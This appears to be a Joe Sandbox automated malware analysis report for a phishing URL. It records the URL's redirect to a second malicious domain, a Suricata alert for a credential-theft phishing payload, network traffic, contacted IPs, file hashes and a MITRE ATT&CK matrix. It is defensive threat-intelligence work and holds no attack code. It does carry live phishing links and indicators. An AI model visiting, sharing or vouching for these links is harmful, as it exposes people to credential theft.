Edit tour

Windows Analysis Report
https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=

Overview

General Information

Sample URL:	https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=
Analysis ID:	1500440
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Suricata IDS alerts for network traffic

HTML page contains hidden javascript code

Classification

Process Tree

System is w10x64

chrome.exe (PID: 4888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1984,i,5261450469489560156,4049961592972443817,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Suricata Signatures

ETPRO PHISHING JS/PsyduckPockeball Payload Inbound - Source IP: 157.230.22.210 - Destination IP: 192.168.2.4

Timestamp:	2024-08-28T13:31:47.233483+0200
SID:	2857090
Severity:	1
Source Port:	443
Destination Port:	49741
Protocol:	TCP
Classtype:	Successful Credential Theft Detected

HTTP traffic detected: POST /recaptcha/api2/reload?k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 9372sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-protobufferAccept: */*Origin: https://www.google.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHhAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://cloud.google.com/contact
Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: chromecache_78.2.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_78.2.dr	String found in binary or memory: https://recaptcha.net
Source: chromecache_78.2.dr	String found in binary or memory: https://support.google.com/recaptcha
Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://support.google.com/recaptcha#6262736
Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://support.google.com/recaptcha/#6175971
Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
Source: chromecache_67.2.dr	String found in binary or memory: https://www.google.com/recaptcha/api.js
Source: chromecache_73.2.dr, chromecache_59.2.dr, chromecache_82.2.dr, chromecache_70.2.dr, chromecache_78.2.dr	String found in binary or memory: https://www.google.com/recaptcha/api2/
Source: chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	String found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__.
Source: chromecache_80.2.dr, chromecache_73.2.dr, chromecache_70.2.dr, chromecache_64.2.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__en.js

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49780 version: TLS 1.2

Source: classification engine

Classification label: mal56.win@18/41@12/8

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1984,i,5261450469489560156,4049961592972443817,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1984,i,5261450469489560156,4049961592972443817,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=	0%	Avira URL Cloud	safe
https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=	0%	Virustotal		Browse
https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=	100%	SlashNext	Fraudulent Website type: Phishing & Social Engineering

Source	Detection	Scanner	Label	Link
www.google.com	0%	Virustotal		Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.gstatic.c..?/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__.	0%	URL Reputation	safe
https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca	0%	URL Reputation	safe
https://developers.google.com/recaptcha/docs/faq#localhost_support	0%	URL Reputation	safe
https://support.google.com/recaptcha/#6175971	0%	URL Reputation	safe
https://support.google.com/recaptcha#6262736	0%	URL Reputation	safe
https://cloud.google.com/recaptcha-enterprise/billing-information	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://support.google.com/recaptcha/?hl=en#6223828	0%	URL Reputation	safe
https://cloud.google.com/contact	0%	URL Reputation	safe
https://support.google.com/recaptcha	0%	URL Reputation	safe
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que	0%	URL Reputation	safe
https://play.google.com/log?format=json&hasfast=true	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api2/reload?k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh&co=aHR0cHM6Ly9odm1uLnJhdW1mdWVybGViZW4uY29tOjQ0Mw..&hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&size=normal&cb=7ipr88utdgc0	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api.js	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5fq74Km0ZGDuqNCU_pmYFf37TI-6A0_gAenwYHSbFYwCm6V_3S4vCnGn2b1XN7f20v0UeQgXaxsudYAYuVCO_prq-RRxqi4NetwtBUtCW86jSDVGhYj6e1ubgq0DosPP4k4pDhtK5hIAWIscploEbEiIvYplfKdG0wUzcDjW-sCksCBMzNNR2gRlb6bI3VFVuFCX20&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api2/	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV	0%	Virustotal		Browse
https://www.google.com/js/bg/PSKopaksc4v0TeE9MSufUBd6uLsTLN3_1JKIESb4JYg.js	0%	Avira URL Cloud	safe
https://play.google.com/log?format=json&hasfast=true	0%	Virustotal		Browse
https://www.google.com/recaptcha/api.js	0%	Virustotal		Browse
https://www.google.com/recaptcha/api2/bframe?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api2/	0%	Virustotal		Browse
https://www.google.com/js/bg/PSKopaksc4v0TeE9MSufUBd6uLsTLN3_1JKIESb4JYg.js	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
interprimesolutions.com	192.185.216.22	true	false		unknown
hvmn.raumfuerleben.com	157.230.22.210	true	true		unknown
www.google.com	216.58.206.68	true	false	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=	true		unknown
https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh&co=aHR0cHM6Ly9odm1uLnJhdW1mdWVybGViZW4uY29tOjQ0Mw..&hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&size=normal&cb=7ipr88utdgc0	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api2/reload?k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api.js	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5fq74Km0ZGDuqNCU_pmYFf37TI-6A0_gAenwYHSbFYwCm6V_3S4vCnGn2b1XN7f20v0UeQgXaxsudYAYuVCO_prq-RRxqi4NetwtBUtCW86jSDVGhYj6e1ubgq0DosPP4k4pDhtK5hIAWIscploEbEiIvYplfKdG0wUzcDjW-sCksCBMzNNR2gRlb6bI3VFVuFCX20&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh	false	Avira URL Cloud: safe	unknown
https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ==	false		unknown
https://www.google.com/js/bg/PSKopaksc4v0TeE9MSufUBd6uLsTLN3_1JKIESb4JYg.js	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api2/bframe?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://play.google.com/log?format=json&hasfast=true	chromecache_78.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.gstatic.c..?/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__.	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://developers.google.com/recaptcha/docs/faq#localhost_support	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://support.google.com/recaptcha/#6175971	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://support.google.com/recaptcha#6262736	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://cloud.google.com/recaptcha-enterprise/billing-information	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://recaptcha.net	chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/api2/	chromecache_73.2.dr, chromecache_59.2.dr, chromecache_82.2.dr, chromecache_70.2.dr, chromecache_78.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.google.com/recaptcha/?hl=en#6223828	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://cloud.google.com/contact	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://support.google.com/recaptcha	chromecache_78.2.dr	false	URL Reputation: safe	unknown
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que	chromecache_59.2.dr, chromecache_82.2.dr, chromecache_78.2.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.68	unknown	United States	15169	GOOGLEUS	false
142.250.185.100	unknown	United States	15169	GOOGLEUS	false
157.230.22.210	hvmn.raumfuerleben.com	United States	14061	DIGITALOCEAN-ASNUS	true
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
192.185.216.22	interprimesolutions.com	United States	46606	UNIFIEDLAYER-AS-1US	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1500440
Start date and time:	2024-08-28 13:30:43 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://interprimesolutions.com/imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ=
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.win@18/41@12/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.35, 142.250.184.206, 108.177.15.84, 34.104.35.123, 142.250.181.227, 172.217.16.131, 216.58.206.42, 172.217.23.106, 142.250.185.74, 142.250.184.234, 142.250.184.202, 142.250.185.106, 172.217.18.106, 172.217.18.10, 142.250.186.42, 216.58.206.74, 142.250.186.138, 142.250.185.138, 142.250.186.106, 142.250.185.170, 172.217.16.202, 142.250.186.170, 142.250.184.227, 2.19.126.163, 2.19.126.137, 216.58.206.35, 192.229.221.95, 52.165.164.15, 20.242.39.171
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, fonts.gstatic.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, update.googleapis.com, clients.l.google.com, www.gstatic.com, wu-b-net.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Input	Output
URL: https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ== Model: jbxai

URL: https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ== Model: jbxai

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
Category:	downloaded
Size (bytes):	600
Entropy (8bit):	7.391634169810707
Encrypted:	false
SSDEEP:	12:6v/7OEUT9vceKKNtY3kM8O+mucROzZbJOAjPBE2Iq8AnxT9:bTdcVIM8tfHzzjy2IdKT9
MD5:	0F2A4639B8A4CB30C76E8333C00D30A6
SHA1:	57E273A270BB864970D747C74B3F0A7C8E515B13
SHA-256:	44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
SHA-512:	3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
Malicious:	false
Reputation:	low
URL:	https://www.gstatic.com/recaptcha/api2/refresh_2x.png
Preview:	.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...\|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b....@.^.;.u5........H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.

Source: https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ==	HTTP Parser: No favicon
Source: https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ==	HTTP Parser: No favicon
Source: https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ==	HTTP Parser: No favicon
Source: https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ==	HTTP Parser: No favicon
Source: https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ==	HTTP Parser: No favicon

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 178.79.238.128
Source: unknown	TCP traffic detected without corresponding DNS query: 178.79.238.128
Source: unknown	TCP traffic detected without corresponding DNS query: 178.79.238.128
Source: unknown	TCP traffic detected without corresponding DNS query: 178.79.238.128
Source: unknown	TCP traffic detected without corresponding DNS query: 178.79.238.128
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103

